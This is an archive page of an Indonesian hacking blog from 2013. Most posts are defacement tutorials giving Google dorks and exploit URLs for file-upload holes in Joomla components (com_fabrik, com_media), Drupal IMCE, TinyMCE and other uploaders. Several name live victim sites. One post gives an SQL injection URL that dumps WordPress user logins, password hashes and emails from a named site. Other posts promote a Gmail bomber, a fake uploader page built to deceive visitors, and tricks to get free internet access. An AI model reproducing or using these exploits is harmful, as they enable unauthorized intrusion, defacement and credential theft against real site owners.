Archive for 2013

Fresh Socks4 & Socks5

Sabtu, 06 Juli 2013
Posted by Unknown
Tag : ,
 Apa itu "SOCKS"?

Socks5 / 4 proxy adalah proxy serbaguna untuk smua penggunaan sedangkan http proxy hanya dapat digunakan untuk berselancar. Anda dapat menggunakan Socks5 / 4 proxy untuk mengirim email, transfer file, chat online, bermain game serta situs web surfing.

Semua Socks5 / 4 proxy adalah anonim sedangkan http proxy dapat menyembunyikan identitas atau transparan

Semua Socks5 / 4 proxy mendukung https / ssl sementara http proxy hanya beberapa saja yg mendukung https.

Ada dua versi socks proxy: versi 4 dan 5. Socks5 mendukung UDP , resolusi nama dan otentikasi, sementara Socks4 tidak. UDP (User Datagram Protocol) merupakan protokol sederhana dan lebih cepat dari TCP (Transmission Control Protocol) tapi tidak bisa diandalkan sehingga biasanya digunakan untuk mentransfer suara dan video, bukan file. Hanya Socks5 yg mendukung UDP proxy.

Sekarang saya akan bagi2 socks yang masih fresh,langung saja klik link dibawah ini :


CBF Tools - GMail Bomber

Jumat, 05 Juli 2013
Posted by Unknown
CBF Team has been Released a new Tools , with new Added Bomber Mail . Here a Screenshot

You must have this tools,the tools awesome for all :) If you want to download this app . Please click the Link Server in below ^o^

P.S ( No Virus 100% Clean :) )



Hai selamat datang kembali di blog saya,kali ini saya telah menemukan salah satu cara untuk menjawab semua pertanyaan dari Translate Question Twitter , Apa sih Twitter Translate itu ? Coba cari aja di google yak hehehe :D

Okay langsung saja kita ikuti step by step tutorial nya,

1. Kalian masuk terlebih dahulu ke Page/Site Twitter Translator Centre

- Klik Disini

2. Setelah masuk nanti kalian akan menemukan Page seperti ini

 3. Nah lalu kalian klik " Lessons " setelah itu nanti akan keluar lagi Page Seperti ini

 
4. Lalu bila kalian menemukan " Take Lesson " langsung saja klik Page itu kalau yang " Lesson Finished " Bearti itu sudah dikerjakan

5.Sebelumnya saya disini memilih Question yang " Glossary 2 " ( Boleh bebas juga kok )

6. Setelah kalian memilih salah satu Question nya, langsung saja kita lihat untuk mendapatkan 100% Jawaban yang akurat Tepat :D , seperti ini caranya
 - Setelah masuk ke halaman Question , langsung saja klik kanan pada mouse dan pilih menu " Inspect Element "

7. Lalu nanti lihat pada source code setelah kalian klik tombol " Inspect Element " seperti ini


- Lihat disitu kalian akan menemukan code seperti ini < div class="container" > kalian klik tombol dropdown itu

8. Setelah klik tombol dropdown dari code yang tadi kalian akan menemukan seperti ini
- 1. Tombol pertama yang tadi
- 2. Sekarang kalian klik lagi < div class="interior">
- 3. Lalu sesudah klik itu , klik lagi < div class="container" >
- 4. Nah,beres untuk klik tombol2 dropdown itu , terakhir klik tombol < div class="question" >

9.Tombol terakhir < div class="question" > akan memberikan lagi suatu dropdown yang harus di klik seperti tadi,seperti ini
 
- 1. tombol question yang tadi setelah di buka
- 2. Setelah memilih yang pertama , lalu kalian pilih tombol dropdown pada  < div class="choices control-group" >
- 3. Setelah klik itu , akan ada pilihan tombol radio yang isinya adalah ada jawaban dari itu ( Kalian pilih saja yang mana untuk memilih nya ) setelah itu lihat pada gambar selanjutnya untuk keterangan

10. Dan inilah keterangan untuk jawaban yang BENAR dan SALAH
- 1. data-correct="true" dan itu adalah code dimana jawaban yang benar
- 2.data-correct="false" dan itu adalah jawaban yang sebaliknya,alias code itu memberikan jawaban yang salah
11. Nah , sekarang kita tahu jawaban yang tepat dan akurat 100% nya dari question itu . Langsung aja deh lihat pada posisi berapa Radio button itu , ( Jawaban yang sekarang saya ini Radio Button yang Pertama ) dan jawaban nya adalah.................

Bagaimana? benar kan " Well done! " untuk melanjutkan nya lakukan seperti itu lagi , dan klik " done " jangan lupa untuk melanjutkan question selanjutnya..

See you , semoga bermanfaat untuk semuanya ^o^
Sekian
By Vladimir ( Raidinoor )
Thanks for : CBF Team | Tasikcyber Team

Anonymous File Locker [Encryp & Decrypt]

Sabtu, 15 Juni 2013
Posted by Unknown
Haloo,,udah lama gak posting di blog kali ini saya akan share tentang File Locker .. Apa sih file locker itu ?

Jadi disini Anonymous File Locker menyediakan fasilitas Untuk Encrypt dan Decrypt , Apa sih Encrypt dan Decrypt itu ? :/

Encryption adalah proses untuk “mengaburkan” informasi untuk membuat informasi tersebut tidak bisa dibaca tanpa pengetahuan khusus. Algoritma penyandian yang paling klasik adalah dengan subtitution, yaitu menukarkann huruf yang satu dengan yang lain.

dan Decryption itu sebalik nya

Decrypt adalah Proses untuk "membongkar" informasi yang sudah di encrypt untuk membuat informasi tersebut bisa di baca.

Nah sekarang kalian sudah tau kan fungsinya dari Encrytp dan Decrypt? Yaudah bagus :D jadi langsung aja yah kita liat Screenshotnya dulu ;;) :D

Disitu Anonymous File Locker memberikan Password , jadi tidak bisa memberikan file nya begitu aja jadi harus kita lock dulu :D

Gambar File hasil yang sudah di lock oleh Anonymous File Locker 


Siip deh jadi file kita aman :D , kalau mau ngbukanya lagi tinggal di Decrypt , masukan password yang udah kita tentuin sebelumnya,,file berhasil kebuka kembali ;)


Bagi yang mau download bisa kok langsung aja download dengan link di bawah ini

Internet Gratis Smartfren

Rabu, 05 Juni 2013
Posted by Unknown
Selamat malam , lagi jalan2 ke blognya si septo maho :v nemu ginian , yaudah deh lapor dulu buat di copas . dan ternyata di bolehin :ngakaks: yowes lah langsung aja to the point



Tools yang dibutuhkan bro :

Modem + Kartu Smartfren (Registrasi)!
SBF 2.3.5 (SSH Best Free) - 6.21 MB

TG Smart Tools - 560.81 KB
Serial TG SMART Tools
- 51.2 KB



kita langsung lanjut ke tutorialnya bro.. :)

Connect si Semarpret dlu (MODEM)..
Extract TG SMART.zip, dan buka file MRHPxEnableHook.exe (kalau udah buka gausah diapa2in, kalo cara gue.)
sekarang kamu buka file TG SMART.exe.
tg smart tools
kamu klik " GO " lalu akan muncul lagi klik Pilih Smart 1 Listen 8089 lalu klik " START "

sekarang Extract SBF 2.35.zip, Buka file BEST FREE.exe
akan muncul tulisan " Press any to continue.. " < itu klik ENTER saja.

lalu akan muncul seperti ini..
konfigurasi
Tulis pilih smartfren dgn cara tekan " G ".
lalu akan muncul lagi penampakan kyk gni bro.. disini lu disuruh pilih server..
kalo gw sih recomended buat SMARTFREN yang Thailand (soalnya dah biasa).
piih server
nah trus kalo udah bakal kyk gni tampilannya

aseeek
kita restart dlu bro.. dgn cara tekan " A "..
nah.. kan ngerestart tuh.. bakal ke tampilan situ lagi.. slesai deh..


Sumber

Memudahkan Registry GWarnet untuk Gemscool

Senin, 03 Juni 2013
Posted by Unknown
Tag :
Hallo,lagi jalan2 ke forum sebelah nemu Trik buat Memudahkan Registry GWarnet untuk game Gemscool nih , langsung aja curi Source Code dibawah ini ;)


On Error Resume Next
fid=InputBox("Masukkan ID G-Warnet anda", "ID")

If fid = "" then
WScript.quit
End if

fpass=InputBox("Masukkan PASSWORD G-Warnet anda", "PASSWORD")

Set http = CreateObject("Microsoft.XmlHttp")
http.open "POST", "http://account.gemscool.com/warnet/login.php?id=" + fid + "&pwd=" + fpass, FALSE
http.send ""

Set xmlDoc = CreateObject( "Microsoft.XMLDOM" )
xmlDoc.async = False
xmlDoc.loadXML(http.responseText)

resultCode = xmlDoc.getElementsByTagName("resultCode").item(0).text


if resultCode = "S000" Then
wn = xmlDoc.getElementsByTagName("wn").item(0).text

Set TypeLib = CreateObject("Scriptlet.TypeLib")
pcKey = Mid(TypeLib.Guid, 2, 36)

Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.RegWrite "HKEY_CURRENT_USER\Software\Gemscool\Premium\key", pcKey, "REG_SZ"

pc_name = WshShell.ExpandEnvironmentStrings( "%COMPUTERNAME%" )

strComputer = "."
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
Set colItems = objWMIService.ExecQuery("Select * from Win32_NetworkAdapterConfiguration WHERE IPEnabled='TRUE'",,48)
For Each objItem in colItems
http.open "POST", "http://account.gemscool.com/warnet/addWarnetPC.php?wn=" + wn + "&macAddr=" + objItem.MACAddress+ "&pcKey=" + pcKey + "&pcIp=" + objItem.IPAddress(0) + "&pcNm=" + pc_name, FALSE
http.send ""
Next
Wscript.Echo "PC ini telah sukses terdaftar di G-Warnet."
else
Wscript.Echo "PC ini telah gagal terdaftar di G-Warnet."
end if

set http = nothing

Copy Source diatas ke Notepad
Lalu kita Save dengan nama file :
GWarnet_Register.vbs
Halo , saya akan share dimana sebelumnya saya juga share tentang IMCE Drupal Uploader dan kali ini juga saya akan share tentang MDBTemplate .. Jadi tutorial ini sama kaya IMCE kok .. tinggal cari web yang vuln .. lalu kita pasang deh file .HTML kita...



Check this out! :D

1. Kita cari dork nya kaya biasa :
inurl:mdbtemplate/mytemplate ( Kreasikan sesukamu :P )


2. Lalu kita Masukan Exploitnya :
http://localhost//e-diary/makehtml/fileupload.php

3. Dan tadaaa kita upload deh file HTML kita ... untuk cek file nya bisa cek di dir
http://localhost/site_data/crcn_www/MyOffice/images/file.html

Mudah kan? ^_^ Untuk live Demo bisa coba dibawah ini ;)

http://www.old.crcn.in.th/

Haloo balik lagi dengan saya bang vladimir,kali ini saya akan share tentang IMCE Drupal Uploader , jadi dimana kita tinggal cari website yang vuln dan bisa di akses untuk upload nya , dan upload deh file .HTML atau .TXT (Kadang .HTML not allowed dan .PHP , jadi coba saja untuk metode Tamper Data )



Baiklah to the point,ikuti tutorialnya dibawah ini :

1. Cari Dorknya dengan seperti ini :
inurl:"/imce?dir= .com ( Kreasikan Dork nya sesuka anda :p )

2. Lalu setelah menemukan web yang vuln ( bisa di upload ) kita bisa klik File tombol " Upload " Di atas kiri ..

3. Pilih file .HTML atau .TXT yang di ingiinkan, Setelah sukses di upload ada notice " Your File is Succes Uploaded "

4. Lalu kita Double Klik file .HTML atau .TXT kita , otomatis akan di redirect ke hasil deface ..

Dannn...jadilah kita memasang kan file .HTML atau .TXT Kita ;))


Live Target :
http://gastronomie.aquitaine.fr/imce?dir=images/images_entreprises
http://www.sitnusa.org/imce?dir=images


Sekian...
Semoga Bermanfaat
reWrite by Bang Vladimir

Moxiecode TINYmce File Upload

Minggu, 02 Juni 2013
Posted by Unknown
Hallo,balik lagi dengan saya..saya sekarang akan share tentang Exploit " Moxiecode File Upload " jadi dimana kita akan langsung cari target yang sudah di temukan lalu kita Upload File kita,dan tada file telah di upload dan tidak perlu susah untuk mencari bug nya :)
Baiklah tutorial nya ikuti di bawah ini :



1. Kaya biasa cari Dork nya Seperti ini :

intitle:Moxiecode File browser filetype:php site:.com
3. Lalu kalau udah nemu web yang udah bisa di akses file manager nya pilih gambar file uploader yang seperti ini :
4. Lalu udah gitu pilih file .HTML kalian (*Karena file .PHP nya tidak bisa di upload,coba untuk metode Tamper Data #FF Lucky :D )

5. Dan jangan lupa untuk mengisikan nama di file " As file name : " nya , karena kalau tidak begitu tidak bisa di upload .

6. Lalu kalau sudah gitu kita cek file itu di url :
http://target.com/skins/default/js/tiny_mce/plugins/filemanager/filemu.html

Sekian,
Semoga bermanfaat

Com_Fabrik Exploit

Jumat, 31 Mei 2013
Posted by Unknown
Halo,kembali lagi dengan saya bang vladimir :D
Kali ini saya akan share tentang Exploit Com_Fabrik exploit ini hampir sama dengan exploit sebelumnya yaitu Com_Media Exploit ..


Jadi kita disini mencari web yang akan di tanem Exploitnya dan kita Upload file .HTML ataupun .TXT milik kalian :)
Jadi langsung saja untuk tutorial ikuti caranya dibawah ini :)

1.Cari Dork dengan cara :
 inurl:index.php?option=com_fabrik site:.us
( Kreasikan dork anda dengan mengganti site yang di ingiinkan *Cari saja di google banyak kok :P )

2. Lalu kita cari target untuk di Exploit , Saya akan memberi demo untuk test page .
Sebelum di kasih Exploit :
http://www.weddinginitaly.us/index.php?option=com_fabrik&view=form&fabrik=2&random=0&Itemid=11

3.Lalu disini kita langsung saja masukan Exploit Com_Fabrik nya dengan cara mengganti Text yang berwarna Merah tersebut dengan Exploit :
index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=1echercher
( Contoh : http://target.com/index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=1echercher )

4. Lalu bila Website tersebut vuln Maka kalian akan masuk ke Uploader CSV , Seperti inilah uploader nya :
5. Upload file .HTML atau .TXT milik kalian , lalu sesudah di upload nanti kalian bisa cek di http://targetmu.com/media/hasilupload.txt // .html dan atau bisa juga upload file .PHP dengan cara metode Tamper Data :)

Tadaaa...Kalian sudah menanam File deface milik kalian..
Sekian untuk tutorial Com_Fabrik Exploit..

Semoga Bermanfaat 
reWrite by Vladimir 

Com_Media Exploit

Rabu, 22 Mei 2013
Posted by Unknown
Haloo bro ,, balik lagi sama gue :D skrg ane mau share tentang com_media exploit :D jadi kita langsung tanam exploit dan upload deh file deface kita (*NOTE : File .txt Only) Ya brooo :D


Dork : inurl:com_media site:my
Exploit : /index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=

 Langsung aja kalo dah ketemu targetnya kita tanem exploit nya seperti ini Http://targetmu.my/explottarosini , nanti keluar uploader image .. kita taro deh file deface .txt kita disitu ,, dan tara cek deh di dir IMAGES/Filemu.txt
Semoga bermanfaat ^_^ 
reWrite by Vladimir 
Halo balik lagi sama saya,saya sekarang akan share tenang exploit Insert File .. jadi langsung aja ke tutorial untuk nyoba nya ok :D



Check this out!

Dork : inurl:"/insert_file.php"

Kita langsung saja nyari targetnya gak perlu capek langsung upload .html .txt saja , tidak support .php yaaa inget :D untuk pengecekan lokasi nya.. silahkan klik file setelah di upload :D tadaa gotz hacked :D

Live Target :

Kali ini saya akan share tentang Free Hosting dari bluewhite host , lumayan nih hosting buat ngeceng website sendiri :D biaya perbulan nya ini gratis ko ga pake bayar :D Jadi kita langsung daftar akun > build > share deh web kita ^_^ , nah ini dia untuk spesifikasi Hosting nya :


•20 GB Free Space 
•150GB Free Monthly Bandwidth
 •10 Email Accounts 
•10 Ftp Accounts 
•10 Databases 
•10 Email Lists 
•10 SubDomain 
•10 Parked Domain 
•10 Addon Domain 
•Complete and Real cPanel. 
•Softaculous.

Cukup menarik bukan? Langsung saja deh ikutin step nya kalo pingin dapetin free hosting ^_^

1. Daftar terlebih dahulu di hosting nya , klik disini 
2. Lalu kalian pilih Orderan yang paket nya " Free Hosting Plan " , Klik tombol " Order "
3. Disitu ada pilihan untuk " Domain " atau " Subdomain "
- Untuk yang sudah punya domain tinggal klik menu " Domain " , dan kalau pingin domain gratis klik " Sub Domain .
4. Kalau sudah Pilih paket dan Domain lalu jangan lupa ceklis "
Daftarkan nama anda di kolom yang sudah di sediakan , seperti inilah gambarnya :


(*NOTE : Untuk email di pastikan aktif dan bisa di akses,karena akun cPanel kita akan di kirim ke email kita , dan Telephone kita isikan bebas aja :D )

Kalau sudah mengisi semua data untuk akun kita langsung saja klik tombol " Next Step " , dan setelah itu kita akan di pilih untuk mengisikan domain yang di inginkan (*NOTE : kalau saya pake subdomain aja sih :D ) seperti ini :
7. Setelah itu klik saja " Next Step " , lalu tunggu proses untuk pengecekan dari hosting nya . Bila ada error seperti ini : " Error: Sorry, the password you selected cannot be used because it is too weak and would be too easy to crack. Please select a password with strength rating of 90 or higher. " Berarti harus di " Previuous Step " sampai ke pendaftaran (*NOTE : Gantikan password kalian dengan yang lebih susah dari pada yang sebelum nya katanya supaya tidak bisa di crack :D )

8. dan Kalau sudah berhasil kalian akan mendapatkan suatu notice seperti ini : " Your account has been created!
You may now use the client login bar to see your client area or proceed to your control panel. An email has been dispatched to the address on file. " langsung saja " Next Step " dan cek Email kalian untuk mengaktifasikan supaya web anda bisa di akses ^_^

9.Done Website + Free cPanel anda sudah jadi :D , dan untuk login panel hosting nya DISINI dan untuk mengakses cpanel nya seperti biasa ^_^ http://namadomainanda.bluewhitehosting.com/cpanel atau http://namadomainanda.com/cpanel


Update for NS :
ns1.pixels-hosts.co.uk 
ns2.pixels-hosts.co.uk
 
Enjoy ;)


Semoga bermanfaat,
by Vladimir

SOCENG Visitor

Jumat, 10 Mei 2013
Posted by Unknown


Kali ini saya akan share tentang SOCENG Visitor , jadi trik ini adalah dimana kita akan di kasih seperti Upload Shell ( Defacer pasti seneng dong kalo nemu Shell :P ) nah disini kita akan menipu dengan trik ini sehingga kita akan ng-redirect ke Web yang akan di naikan Visitornya :P

Contoh nya seperti ini :


Kalo kalian klik Tombol " Upload File's " Kita akan ng-redirect ke index web itu . Nah seperti itulah trik SOCENG dari saya :P dan jika ingin mengambil scriptnya bisa lihat coding di bawah ini :

<!-- Freaks404 A.k.a Vladimir Coding Simple :P -->
<body>
<title> FrZUpL0ad3R </title>
<form action ="/index.html" metode="post" enctype="multipart/form-data">
<label for="file"> Filename (allowed .php , .html , .asp ): </label>
<input type="file" name="file" id="file" />
<br />
    <button type="submit">Upload File's</button>
</form>
</form>
</body>

Nah simpan Coding script ini Dengan Ekstensi .PHP ( Kalo .html entar masa uploader .HTML :ngakak ) disini ada beberapa jenis yang harus di genti seperti :

Merah : Ini terserah namanya mau apa yang jelas ini Title nya :P
Hijau : Nah disini yang harus di genti dengan baik,kita arahkan ini dengan nama Domain yang akan kalian tambahkan visitornya (*EX : http://namawebsitemu.com )
Biru : Nah disitu deskripsi untuk Uploader yang mungkin emang pengen kalian genti 


Sekian tutorial yang saya kasih,
Semoga bermanfaat

Wordpress Remote File Uploadify

Kamis, 02 Mei 2013
Posted by Unknown
Tag :

Hallo selamat malam,saya akan share tentang Exploit baru lagi nih , yaitu Wordpress Remote File Uploadify ... jadi trik ini simpel ko kita tinggal cari target dan langsung upload deh .html kita ;)
So , lets go for this Tutorial !

Dork :
inurl:Editor/assetmanager/assetmanager.asp

Seperti inilah ketika kita sudah masuk ke Uploader nya :


*Text yang berwarna kuning itu lah File .HTML punya saya , dan di sebelah kiri di textbox itu adalah path dari dimana lokasi file kita :)

Cara nya adalah :

1. Cari target Dari Dork yang sudah di tentukan
2. Lalu kalau sudah ketemu klik tombol " Browser " , dan cari file .HTML kalian
3. Lalu klik tombol " Upload "
4. Dan tada cek Textbox diatas tombol " Upload " Copykan seperti ini
http://targetyangsudahditemukan.com/isi-dari-textbox-di-atas-uploader
5. Tada,,done deh sudah di upload file .HTML kalian :)





Dan ini adalah Live Demo untuk testing :

http://egypt-hosts.com/Editor/assetmanager/assetmanager.asp
http://www.easyblog.dk/editor/Assetmanager/assetmanager.asp?lang=danish&name=Min+Folder&path=%2Fusers%2FvDavidsenvV%2F

Sekian,
semoga Bermanfaat

SQLi WP Spreadsheet v 0.6

Selasa, 30 April 2013
Posted by Unknown
Tag :
Selamat malam dan apa kabar,maaf sebelumnya ini blog baru lagi :3 karena blog sebelum nya saya lupa email :ngakak: . Saya akan share Exploit WP Spreadsheet Wordpress , langsung aja ya di cobain..

Sebelumnya kita harus cari Dork nya dulu,seperti ini :
Dork : inurl:/wp-content/plugins/wpSS/
Lalu kita mencari Examplenya seperti ini :
http://www.aideenrogers.com/wp-content/plugins/wpSS/
Disini kita langsung saja menambah kan file .PHP plugin nya Seperti ini 
http://www.aideenrogers.com/wp-content/plugins/wpSS/ss_load.php
 Nah mari kita coba SQLi nya dengan menambahkan sedikit resep code :ngakak: seperti ini :
http://www.aideenrogers.com/wp-content/plugins/wpSS/ss_load.php?ss_id=1+and+(1=0)+union+select+1,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4+from+wp_users--&display=plain

Nah sebagai contoh kita udah masuk ke ss_load.php nya seperti ini :
Disitu ada Tulisan Hacked by , jadi kita sudah bisa langsung meng-hack website itu lewat Spreadsheet nya :)

* Untuk plugin yang belum terpatch,textnya akan tetap menjadi seperti itu . jikalau sudah di patch berarti tidak bisa di genti text nya :) *

Sekian dan terimakasih,
Semoga bermanfaat ya

Blogger templates

Welcome to My Blog

Popular Post

Blogger templates

Followers

Copyright © Vladimir Penetration Labs 2013. Diberdayakan oleh Blogger.

- Copyright © :: Vladimir Penetration Labs :: -Robotic Notes- Powered by Blogger - Designed by Johanes Djogan -